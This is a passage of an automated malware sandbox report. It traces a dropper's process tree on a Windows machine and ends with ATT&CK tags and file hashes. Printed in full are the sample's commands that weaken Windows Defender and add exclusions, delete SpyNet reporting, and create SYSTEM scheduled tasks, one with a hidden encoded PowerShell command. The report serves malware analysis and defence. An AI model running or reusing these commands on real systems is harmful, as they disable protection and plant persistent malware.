/reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CgqbhrirU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CgqbhrirU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LBHdSxvSsGUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LBHdSxvSsGUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHKJFdwYUyvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHKJFdwYUyvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSPWXtASFZsjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qSPWXtASFZsjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HxJeplZVKRnYAfVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\HxJeplZVKRnYAfVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bsMwgdGxqrwnSkCu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\bsMwgdGxqrwnSkCu\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CgqbhrirU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CgqbhrirU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CgqbhrirU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LBHdSxvSsGUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LBHdSxvSsGUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHKJFdwYUyvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHKJFdwYUyvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qSPWXtASFZsjC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qSPWXtASFZsjC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HxJeplZVKRnYAfVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\HxJeplZVKRnYAfVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\qXPJNMcRbBFEeomOU /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bsMwgdGxqrwnSkCu /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\bsMwgdGxqrwnSkCu /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gcjuEejvM" /SC once /ST 07:00:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gcjuEejvM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gcjuEejvM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FNmmdByUIWCoGhfBf" /SC once /ST 09:26:00 /RU "SYSTEM" /TR "\"C:\Windows\Temp\bsMwgdGxqrwnSkCu\aVDTEXthVzMdqDM\AkdHuPQ.exe\" uR /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "FNmmdByUIWCoGhfBf"2⤵
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\Temp\bsMwgdGxqrwnSkCu\aVDTEXthVzMdqDM\AkdHuPQ.exeC:\Windows\Temp\bsMwgdGxqrwnSkCu\aVDTEXthVzMdqDM\AkdHuPQ.exe uR /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnHoQpKIlSSCUFQrDN"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\CgqbhrirU\AWlEAQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NYfziUdouSArZkj" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NYfziUdouSArZkj2" /F /xml "C:\Program Files (x86)\CgqbhrirU\AFgKmwO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "NYfziUdouSArZkj"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NYfziUdouSArZkj"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NpDNAcOvXuDZoE" /F /xml "C:\Program Files (x86)\LHKJFdwYUyvU2\DeWwRiu.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wmKscZdvvFAvN2" /F /xml "C:\ProgramData\HxJeplZVKRnYAfVB\RFQIOSy.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WgwRwQXbezZjjPVwf2" /F /xml "C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\voyJiVr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vFAVgSKrYZZoOjUDvvE2" /F /xml "C:\Program Files (x86)\qSPWXtASFZsjC\fGiGFxP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "phsiVgbIVaYavuCQX" /SC once /ST 05:19:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\bsMwgdGxqrwnSkCu\huoQGPkX\gFDSiUK.dll\",#1 /site_id 525403" /V1 /F2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "phsiVgbIVaYavuCQX"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FNmmdByUIWCoGhfBf"2⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\bsMwgdGxqrwnSkCu\huoQGPkX\gFDSiUK.dll",#1 /site_id 5254031⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\bsMwgdGxqrwnSkCu\huoQGPkX\gFDSiUK.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "phsiVgbIVaYavuCQX"3⤵
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2216 -s 29522⤵
- Program crash
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4532 -s 29002⤵
- Program crash
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2844 -s 26882⤵
- Program crash
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\tcsjwaaC:\Users\Admin\AppData\Roaming\tcsjwaa1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 4842⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\crsjwaaC:\Users\Admin\AppData\Roaming\crsjwaa1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Control Panel
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3abf055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
4Disabling Security Tools
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751MD5
54e9306f95f32e50ccd58af19753d929
SHA1eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA25645f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA5128711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751MD5
0d5a6106fc71ffa549b7f3cf72ac98a0
SHA1e410d196b7258ea3ddcdf3152e2262a5b6919ae6
SHA25651c21c8af2c5d09f364d9b9d3309a1a563e28f93fb97c0066eae9484d7b5ba15
SHA512327c53ef0aace04391b46a820d34b590a3da95228a07b92cbd499420862e40df5f82cf18e234efaa308eee5b52fdbc68311ab71e62b1ad694c75ea5a5b686f08
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Tue026e94a5005f8.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02520f255d0ba43a.exeMD5
c423fce1a632173c50688085267f7c08
SHA180fe9f218344027cc2ecaff961f925535bb77c31
SHA2567a7451bf22fdc92d12a8eadde0e1c7a81e11c187f7d714f3991b0c6bfad94e72
SHA5127ef954b9f94357ce96b1cb0594a46ab09313220075492d653e6fb59c4103d5042a34efcf53167bb6203696e1903ddd6cb4caff3677b9a9b276f3ab8d4769a389
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02520f255d0ba43a.exeMD5
c423fce1a632173c50688085267f7c08
SHA180fe9f218344027cc2ecaff961f925535bb77c31
SHA2567a7451bf22fdc92d12a8eadde0e1c7a81e11c187f7d714f3991b0c6bfad94e72
SHA5127ef954b9f94357ce96b1cb0594a46ab09313220075492d653e6fb59c4103d5042a34efcf53167bb6203696e1903ddd6cb4caff3677b9a9b276f3ab8d4769a389
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02522f9ea0b1.exeMD5
2028d287002527e45e29f6e9bfe31f83
SHA151a78b6e956408348c2847f27badb633320efe82
SHA256c18980ee63d44101ba0a05eb1b7ece5bdd503d71cd59a04f1efdbad16e7a2937
SHA5126231d1bf61376997feefdad82eed01df7f832e8574605c31ac57012ba3aa06eda669e724025400f45c303d03b3c3e7d218e16cc5c9198330e033e3324aa476b0
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue02522f9ea0b1.exeMD5
2028d287002527e45e29f6e9bfe31f83
SHA151a78b6e956408348c2847f27badb633320efe82
SHA256c18980ee63d44101ba0a05eb1b7ece5bdd503d71cd59a04f1efdbad16e7a2937
SHA5126231d1bf61376997feefdad82eed01df7f832e8574605c31ac57012ba3aa06eda669e724025400f45c303d03b3c3e7d218e16cc5c9198330e033e3324aa476b0
-
C:\Users\Admin\AppData\Local\Temp\7zS8B52472E\Tue026e182673.exeMD5
3a9115aa34ddc3302fe3d07ceddd4373
SHA110e7f2a8c421c825a2467d488b33de09c2c2a14b
